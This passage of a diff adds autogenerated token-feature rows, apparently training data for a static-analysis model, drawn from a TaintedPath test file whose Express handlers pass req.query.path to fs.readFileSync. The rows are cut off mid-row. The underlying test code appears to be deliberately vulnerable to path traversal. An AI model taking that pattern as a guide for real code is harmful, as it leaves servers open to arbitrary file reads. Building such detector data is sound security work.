fs.readFileSync | | autogenerated/TaintedPath/normalizedPaths.js:368:19:368:28 | targetPath | InputArgumentIndex | 0 | | autogenerated/TaintedPath/normalizedPaths.js:368:19:368:28 | targetPath | calleeImports | fs | @@ -9602,6 +78930,86 @@ tokenFeatures | autogenerated/TaintedPath/normalizedPaths.js:368:19:368:28 | targetPath | enclosingFunctionName | app.get#functionalargument | | autogenerated/TaintedPath/normalizedPaths.js:368:19:368:28 | targetPath | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:368:19:368:28 | targetPath | receiverName | fs | +| autogenerated/TaintedPath/normalizedPaths.js:370:3:370:2 | this | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:370:3:370:2 | this | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:370:3:370:2 | this | enclosingFunctionBody | req res path req query path fs readFileSync path requestPath pathModule join rootPath path targetPath allowPath requestPath rootPath targetPath rootPath fs readFileSync requestPath targetPath requestPath fs readFileSync requestPath fs readFileSync targetPath allowPath requestPath rootPath requestPath indexOf rootPath 0 | +| autogenerated/TaintedPath/normalizedPaths.js:370:3:370:2 | this | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:370:3:370:2 | this | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:370:3:372:3 | 'arguments' object of function allowPath | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:370:3:372:3 | 'arguments' object of function allowPath | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:370:3:372:3 | 'arguments' object of function allowPath | enclosingFunctionBody | req res path req query path fs readFileSync path requestPath pathModule join rootPath path targetPath allowPath requestPath rootPath targetPath rootPath fs readFileSync requestPath targetPath requestPath fs readFileSync requestPath fs readFileSync targetPath allowPath requestPath rootPath requestPath indexOf rootPath 0 | +| autogenerated/TaintedPath/normalizedPaths.js:370:3:372:3 | 'arguments' object of function allowPath | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:370:3:372:3 | 'arguments' object of function allowPath | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:370:3:372:3 | exceptional return of function allowPath | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:370:3:372:3 | exceptional return of function allowPath | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:370:3:372:3 | exceptional return of function allowPath | enclosingFunctionBody | req res path req query path fs readFileSync path requestPath pathModule join rootPath path targetPath allowPath requestPath rootPath targetPath rootPath fs readFileSync requestPath targetPath requestPath fs readFileSync requestPath fs readFileSync targetPath allowPath requestPath rootPath requestPath indexOf rootPath 0 | +| autogenerated/TaintedPath/normalizedPaths.js:370:3:372:3 | exceptional return of function allowPath | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:370:3:372:3 | exceptional return of function allowPath | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:370:3:372:3 | functio ... 0;\\n } | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:370:3:372:3 | functio ... 0;\\n } | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:370:3:372:3 | functio ... 0;\\n } | enclosingFunctionBody | req res path req query path fs readFileSync path requestPath pathModule join rootPath path targetPath allowPath requestPath rootPath targetPath rootPath fs readFileSync requestPath targetPath requestPath fs readFileSync requestPath fs readFileSync targetPath allowPath requestPath rootPath requestPath indexOf rootPath 0 | +| autogenerated/TaintedPath/normalizedPaths.js:370:3:372:3 | functio ... 0;\\n } | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:370:3:372:3 | functio ... 0;\\n } | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:370:3:372:3 | return of function allowPath | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:370:3:372:3 | return of function allowPath | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:370:3:372:3 | return of function allowPath | enclosingFunctionBody | req res path req query path fs readFileSync path requestPath pathModule join rootPath path targetPath allowPath requestPath rootPath targetPath rootPath fs readFileSync requestPath targetPath requestPath fs readFileSync requestPath fs readFileSync targetPath allowPath requestPath rootPath requestPath indexOf rootPath 0 | +| autogenerated/TaintedPath/normalizedPaths.js:370:3:372:3 | return of function allowPath | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:370:3:372:3 | return of function allowPath | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:370:12:370:20 | allowPath | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:370:12:370:20 | allowPath | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:370:12:370:20 | allowPath | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:370:12:370:20 | allowPath | contextSurroundingFunctionParameters | (requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:370:12:370:20 | allowPath | enclosingFunctionBody | req res path req query path fs readFileSync path requestPath pathModule join rootPath path targetPath allowPath requestPath rootPath targetPath rootPath fs readFileSync requestPath targetPath requestPath fs readFileSync requestPath fs readFileSync targetPath allowPath requestPath rootPath requestPath indexOf rootPath 0 | +| autogenerated/TaintedPath/normalizedPaths.js:370:12:370:20 | allowPath | enclosingFunctionBody | req res path req query path fs readFileSync path requestPath pathModule join rootPath path targetPath allowPath requestPath rootPath targetPath rootPath fs readFileSync requestPath targetPath requestPath fs readFileSync requestPath fs readFileSync targetPath allowPath requestPath rootPath requestPath indexOf rootPath 0 | +| autogenerated/TaintedPath/normalizedPaths.js:370:12:370:20 | allowPath | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:370:12:370:20 | allowPath | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:370:12:370:20 | allowPath | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:370:12:370:20 | allowPath | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:370:22:370:32 | requestPath | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:370:22:370:32 | requestPath | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:370:22:370:32 | requestPath | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:370:22:370:32 | requestPath | contextSurroundingFunctionParameters | (requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:370:22:370:32 | requestPath | enclosingFunctionBody | req res path req query path fs readFileSync path requestPath pathModule join rootPath path targetPath allowPath requestPath rootPath targetPath rootPath fs readFileSync requestPath targetPath requestPath fs readFileSync requestPath fs readFileSync targetPath allowPath requestPath rootPath requestPath indexOf rootPath 0 | +| autogenerated/TaintedPath/normalizedPaths.js:370:22:370:32 | requestPath | enclosingFunctionBody | req res path req query path fs readFileSync path requestPath pathModule join rootPath path targetPath allowPath requestPath rootPath targetPath rootPath fs readFileSync requestPath targetPath requestPath fs readFileSync requestPath fs readFileSync targetPath allowPath requestPath rootPath requestPath indexOf rootPath 0 | +| autogenerated/TaintedPath/normalizedPaths.js:370:22:370:32 | requestPath | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:370:22:370:32 | requestPath | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:370:22:370:32 | requestPath | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:370:22:370:32 | requestPath | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:370:35:370:42 | rootPath | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:370:35:370:42 | rootPath | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:370:35:370:42 | rootPath | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:370:35:370:42 | rootPath | contextSurroundingFunctionParameters | (requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:370:35:370:42 | rootPath | enclosingFunctionBody | req res path req query path fs readFileSync path requestPath pathModule join rootPath path targetPath allowPath requestPath rootPath targetPath rootPath fs readFileSync requestPath targetPath requestPath fs readFileSync requestPath fs readFileSync targetPath allowPath requestPath rootPath requestPath indexOf rootPath 0 | +| autogenerated/TaintedPath/normalizedPaths.js:370:35:370:42 | rootPath | enclosingFunctionBody | req res path req query path fs readFileSync path requestPath pathModule join rootPath path targetPath allowPath requestPath rootPath targetPath rootPath fs readFileSync requestPath targetPath requestPath fs readFileSync requestPath fs readFileSync targetPath allowPath requestPath rootPath requestPath indexOf rootPath 0 | +| autogenerated/TaintedPath/normalizedPaths.js:370:35:370:42 | rootPath | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:370:35:370:42 | rootPath | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:370:35:370:42 | rootPath | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:370:35:370:42 | rootPath | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:371:12:371:22 | requestPath | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:371:12:371:22 | requestPath | contextSurroundingFunctionParameters | (requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:371:12:371:22 | requestPath | enclosingFunctionBody | req res path req query path fs readFileSync path requestPath pathModule join rootPath path targetPath allowPath requestPath rootPath targetPath rootPath fs readFileSync requestPath targetPath requestPath fs readFileSync requestPath fs readFileSync targetPath allowPath requestPath rootPath requestPath indexOf rootPath 0 | +| autogenerated/TaintedPath/normalizedPaths.js:371:12:371:22 | requestPath | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:371:12:371:22 | requestPath | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:371:12:371:40 | exceptional return of request ... otPath) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:371:12:371:40 | exceptional return of request ... otPath) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:371:12:371:40 | exceptional return of request ... otPath) | enclosingFunctionBody | req res path req query path fs readFileSync path requestPath pathModule join rootPath path targetPath allowPath requestPath rootPath targetPath rootPath fs readFileSync requestPath targetPath requestPath fs readFileSync requestPath fs readFileSync targetPath allowPath requestPath rootPath requestPath indexOf rootPath 0 | +| autogenerated/TaintedPath/normalizedPaths.js:371:12:371:40 | exceptional return of request ... otPath) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:371:12:371:40 | exceptional return of request ... otPath) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:371:12:371:40 | request ... otPath) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:371:12:371:40 | request ... otPath) | contextSurroundingFunctionParameters | (requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:371:12:371:40 | request ... otPath) | enclosingFunctionBody | req res path req query path fs readFileSync path requestPath pathModule join rootPath path targetPath allowPath requestPath rootPath targetPath rootPath fs readFileSync requestPath targetPath requestPath fs readFileSync requestPath fs readFileSync targetPath allowPath requestPath rootPath requestPath indexOf rootPath 0 | +| autogenerated/TaintedPath/normalizedPaths.js:371:12:371:40 | request ... otPath) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:371:12:371:40 | request ... otPath) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:371:12:371:46 | request ... ) === 0 | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:371:12:371:46 | request ... ) === 0 | contextSurroundingFunctionParameters | (requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:371:12:371:46 | request ... ) === 0 | enclosingFunctionBody | req res path req query path fs readFileSync path requestPath pathModule join rootPath path targetPath allowPath requestPath rootPath targetPath rootPath fs readFileSync requestPath targetPath requestPath fs readFileSync requestPath fs readFileSync targetPath allowPath requestPath rootPath requestPath indexOf rootPath 0 | +| autogenerated/TaintedPath/normalizedPaths.js:371:12:371:46 | request ... ) === 0 | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:371:12:371:46 | request ... ) === 0 | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:371:24:371:30 | indexOf | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:371:24:371:30 | indexOf | contextSurroundingFunctionParameters | (requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:371:24:371:30 | indexOf | enclosingFunctionBody | req res path req query path fs readFileSync path requestPath pathModule join rootPath path targetPath allowPath requestPath rootPath targetPath rootPath fs readFileSync requestPath targetPath requestPath fs readFileSync requestPath fs readFileSync targetPath allowPath requestPath rootPath requestPath indexOf rootPath 0 | +| autogenerated/TaintedPath/normalizedPaths.js:371:24:371:30 | indexOf | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:371:24:371:30 | indexOf | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:371:32:371:39 | rootPath | CalleeFlexibleAccessPath | requestPath.indexOf | | autogenerated/TaintedPath/normalizedPaths.js:371:32:371:39 | rootPath | InputArgumentIndex | 0 | | autogenerated/TaintedPath/normalizedPaths.js:371:32:371:39 | rootPath | contextFunctionInterfaces | allowPath(requestPath, rootPath) | @@ -9610,6 +79018,42 @@ tokenFeatures | autogenerated/TaintedPath/normalizedPaths.js:371:32:371:39 | rootPath | enclosingFunctionName | app.get#functionalargument | | autogenerated/TaintedPath/normalizedPaths.js:371:32:371:39 | rootPath | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:371:32:371:39 | rootPath | receiverName | requestPath | +| autogenerated/TaintedPath/normalizedPaths.js:371:46:371:46 | 0 | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:371:46:371:46 | 0 | contextSurroundingFunctionParameters | (requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:371:46:371:46 | 0 | enclosingFunctionBody | req res path req query path fs readFileSync path requestPath pathModule join rootPath path targetPath allowPath requestPath rootPath targetPath rootPath fs readFileSync requestPath targetPath requestPath fs readFileSync requestPath fs readFileSync targetPath allowPath requestPath rootPath requestPath indexOf rootPath 0 | +| autogenerated/TaintedPath/normalizedPaths.js:371:46:371:46 | 0 | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:371:46:371:46 | 0 | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:375:1:375:26 | import ... slash'; | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:375:1:375:26 | import ... slash'; | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:375:1:375:26 | import ... slash'; | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:375:8:375:12 | slash | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:375:8:375:12 | slash | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:375:8:375:12 | slash | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:375:8:375:12 | slash | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:375:8:375:12 | slash | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:375:8:375:12 | slash | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:375:8:375:12 | slash | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:375:8:375:12 | slash | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:375:8:375:12 | slash | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:375:8:375:12 | slash | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:375:19:375:25 | 'slash' | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:375:19:375:25 | 'slash' | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:375:19:375:25 | 'slash' | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:376:1:376:3 | app | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:376:1:376:3 | app | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:376:1:376:3 | app | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:376:1:376:7 | app.get | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:376:1:376:7 | app.get | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:376:1:376:7 | app.get | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:376:1:382:2 | app.get ... T OK\\n}) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:376:1:382:2 | app.get ... T OK\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:376:1:382:2 | app.get ... T OK\\n}) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:376:1:382:2 | exceptional return of app.get ... T OK\\n}) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:376:1:382:2 | exceptional return of app.get ... T OK\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:376:1:382:2 | exceptional return of app.get ... T OK\\n}) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:376:5:376:7 | get | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:376:5:376:7 | get | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:376:5:376:7 | get | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:376:9:376:22 | '/slash-stuff' | CalleeFlexibleAccessPath | app.get | | autogenerated/TaintedPath/normalizedPaths.js:376:9:376:22 | '/slash-stuff' | InputArgumentIndex | 0 | | autogenerated/TaintedPath/normalizedPaths.js:376:9:376:22 | '/slash-stuff' | calleeImports | express | @@ -9617,6 +79061,21 @@ tokenFeatures | autogenerated/TaintedPath/normalizedPaths.js:376:9:376:22 | '/slash-stuff' | contextSurroundingFunctionParameters | | | autogenerated/TaintedPath/normalizedPaths.js:376:9:376:22 | '/slash-stuff' | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:376:9:376:22 | '/slash-stuff' | receiverName | app | +| autogenerated/TaintedPath/normalizedPaths.js:376:25:376:24 | fs | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:376:25:376:24 | fs | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:376:25:376:24 | fs | enclosingFunctionBody | req res path req query path fs readFileSync path fs readFileSync slash path | +| autogenerated/TaintedPath/normalizedPaths.js:376:25:376:24 | fs | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:376:25:376:24 | fs | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:376:25:376:24 | slash | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:376:25:376:24 | slash | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:376:25:376:24 | slash | enclosingFunctionBody | req res path req query path fs readFileSync path fs readFileSync slash path | +| autogenerated/TaintedPath/normalizedPaths.js:376:25:376:24 | slash | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:376:25:376:24 | slash | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:376:25:382:1 | 'arguments' object of anonymous function | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:376:25:382:1 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:376:25:382:1 | 'arguments' object of anonymous function | enclosingFunctionBody | req res path req query path fs readFileSync path fs readFileSync slash path | +| autogenerated/TaintedPath/normalizedPaths.js:376:25:382:1 | 'arguments' object of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:376:25:382:1 | 'arguments' object of anonymous function | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:376:25:382:1 | (req, r ... OT OK\\n} | CalleeFlexibleAccessPath | app.get | | autogenerated/TaintedPath/normalizedPaths.js:376:25:382:1 | (req, r ... OT OK\\n} | InputArgumentIndex | 1 | | autogenerated/TaintedPath/normalizedPaths.js:376:25:382:1 | (req, r ... OT OK\\n} | calleeImports | express | @@ -9624,6 +79083,96 @@ tokenFeatures | autogenerated/TaintedPath/normalizedPaths.js:376:25:382:1 | (req, r ... OT OK\\n} | contextSurroundingFunctionParameters | (req, res) | | autogenerated/TaintedPath/normalizedPaths.js:376:25:382:1 | (req, r ... OT OK\\n} | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:376:25:382:1 | (req, r ... OT OK\\n} | receiverName | app | +| autogenerated/TaintedPath/normalizedPaths.js:376:25:382:1 | exceptional return of anonymous function | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:376:25:382:1 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:376:25:382:1 | exceptional return of anonymous function | enclosingFunctionBody | req res path req query path fs readFileSync path fs readFileSync slash path | +| autogenerated/TaintedPath/normalizedPaths.js:376:25:382:1 | exceptional return of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:376:25:382:1 | exceptional return of anonymous function | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:376:25:382:1 | return of anonymous function | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:376:25:382:1 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:376:25:382:1 | return of anonymous function | enclosingFunctionBody | req res path req query path fs readFileSync path fs readFileSync slash path | +| autogenerated/TaintedPath/normalizedPaths.js:376:25:382:1 | return of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:376:25:382:1 | return of anonymous function | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:376:26:376:28 | req | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:376:26:376:28 | req | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:376:26:376:28 | req | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:376:26:376:28 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:376:26:376:28 | req | enclosingFunctionBody | req res path req query path fs readFileSync path fs readFileSync slash path | +| autogenerated/TaintedPath/normalizedPaths.js:376:26:376:28 | req | enclosingFunctionBody | req res path req query path fs readFileSync path fs readFileSync slash path | +| autogenerated/TaintedPath/normalizedPaths.js:376:26:376:28 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:376:26:376:28 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:376:26:376:28 | req | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:376:26:376:28 | req | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:376:31:376:33 | res | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:376:31:376:33 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:376:31:376:33 | res | enclosingFunctionBody | req res path req query path fs readFileSync path fs readFileSync slash path | +| autogenerated/TaintedPath/normalizedPaths.js:376:31:376:33 | res | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:376:31:376:33 | res | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:377:7:377:10 | path | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:377:7:377:10 | path | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:377:7:377:10 | path | enclosingFunctionBody | req res path req query path fs readFileSync path fs readFileSync slash path | +| autogenerated/TaintedPath/normalizedPaths.js:377:7:377:10 | path | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:377:7:377:10 | path | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:377:7:377:27 | path | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:377:7:377:27 | path | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:377:7:377:27 | path | enclosingFunctionBody | req res path req query path fs readFileSync path fs readFileSync slash path | +| autogenerated/TaintedPath/normalizedPaths.js:377:7:377:27 | path | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:377:7:377:27 | path | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:377:7:377:27 | path = ... ry.path | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:377:7:377:27 | path = ... ry.path | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:377:7:377:27 | path = ... ry.path | enclosingFunctionBody | req res path req query path fs readFileSync path fs readFileSync slash path | +| autogenerated/TaintedPath/normalizedPaths.js:377:7:377:27 | path = ... ry.path | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:377:7:377:27 | path = ... ry.path | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:377:14:377:16 | req | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:377:14:377:16 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:377:14:377:16 | req | enclosingFunctionBody | req res path req query path fs readFileSync path fs readFileSync slash path | +| autogenerated/TaintedPath/normalizedPaths.js:377:14:377:16 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:377:14:377:16 | req | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:377:14:377:22 | req.query | contextFunctionInterfaces | allowPath(requestPath, 